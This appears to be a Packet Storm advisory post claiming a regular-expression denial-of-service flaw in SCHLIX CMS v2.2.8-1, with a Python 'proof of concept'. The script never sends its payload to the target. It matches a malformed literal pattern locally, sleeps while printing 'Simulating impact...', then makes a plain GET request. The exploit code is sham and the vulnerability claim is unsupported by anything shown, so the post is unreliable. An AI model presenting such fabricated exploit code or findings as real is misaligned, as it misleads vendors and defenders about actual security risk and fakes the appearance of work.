SCHLIX version 2.2.8-1 suffers from a REGEX processing denial of service vulnerability.
97341cf6bbf89a8ae8294049148c0895151eaece566aac5906aa0c604c223a94# Exploit Title: SCHLIX v2.2.8-1 Regular Expression Denial of Service
# Date: 02/10/2024
# Exploit Author: Diyar Saadi
# Vendor Homepage: https://www.schlix.com
# Software Link: https://www.schlix.com/html/schlix-cms-downloads.html
# Version: v2.2.8-1
# Tested on: Windows 11 + XAMPP
## Description ##
SCHLIX v2.2.8-1 is vulnerable to regular expression denial of service . (ReDoS) is an algorithmic complexity attack that produces a denial-of-service by providing a regular expression and/or an input that takes a long time to evaluate…
## Proof Of Concept ##
import requests
import re
import time
def test_redos(url, payload):
try:
vulnerable_regex = r'(.*a){x} for x > 10'
match = re.match(vulnerable_regex, payload)
if match:
print("Vulnerability not triggered.")
else:
print("Vulnerability may be present. Simulating 30-second impact...")
for _ in range(6):
time.sleep(5)
print("Simulating impact...")
print("Simulated impact duration completed.")
except re.error:
print("Error in regex pattern.")
try:
response = requests.get(url)
if response.status_code == 200:
print("Service is up.")
else:
print("Service may be down or inaccessible.")
except requests.RequestException as e:
print(f"HTTP Request Error: {str(e)}")
if __name__ == "__main__":
target_url = 'http://localhost'
payload = "aaaaaaaaaaaaaaaaaaaaaaaaa!"
test_redos(target_url, payload)
Sent with [Proton Mail](https://proton.me/) secure email.
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed